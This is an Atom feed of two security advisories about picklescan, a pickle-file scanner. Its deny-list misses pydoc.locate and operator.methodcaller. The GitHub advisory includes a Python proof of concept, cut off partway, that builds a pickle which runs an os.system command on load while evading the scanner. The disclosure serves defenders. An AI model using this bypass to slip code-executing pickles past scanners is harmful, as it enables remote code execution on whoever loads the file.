<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-10T14:30:58.875394+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cve-2025-71320</id>
    <title>CVE-2025-71320 — picklescan - Remote Code Execution via Incomplete Disallowed Inputs</title>
    <updated>2026-10-10T14:30:58.877147+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> picklescan</p>
<p>picklescan before 0.0.33 contains an incomplete deny-list that fails to block pydoc.locate and operator.methodcaller functions, allowing attackers to bypass security checks. Remote attackers can craft malicious pickle files using these unblocked functions to achieve arbitrary code execution when the pickle is deserialized.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cve-2025-71320"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-84r2-jw7c-4r5q</id>
    <title>GHSA-84r2-jw7c-4r5q — Picklescan has Incomplete List of Disallowed Inputs</title>
    <updated>2026-10-10T14:30:58.877230+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: picklescan</p>
<p>### Summary
Currently picklescanner only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to go through undetected and achieve RCE on the final user. Particularly
* pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string "os" to the actual os module).
* operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system.</p>
<p>Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as "Safe" or "Suspicious" (depending on configuration) but does not flag them as "Dangerous", allowing the malicious file to bypass the security check.</p>
<p>### PoC</p>
<p>use the provided script to create a malicious pickle file</p>
<p>```python
import pickle
import pydoc
import operator
import os</p>
<p>class ModuleLocator:
    def __init__(self, module_name):
        self.module_name = module_name
        
    def __reduce__(self):
        return (pydoc.locate, (self.module_name,))</p>
<p>class RCEPayload:
    def __reduce__(self):
        
        cmd = "notepad" #put your payload here
        
        mc = operator.methodcaller("system", cmd)
        return (mc, (ModuleLocator("os"),))</p>
<p>def generate_exploit():
    payload = RCEPayload()
    
    try:
        with open("bypass.pkl", "wb") as f:
            f.write(pickle.dumps(payload))
        print("File 'bypass.pkl' created.")
    except E…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-84r2-jw7c-4r5q"/>
  </entry>
</feed>
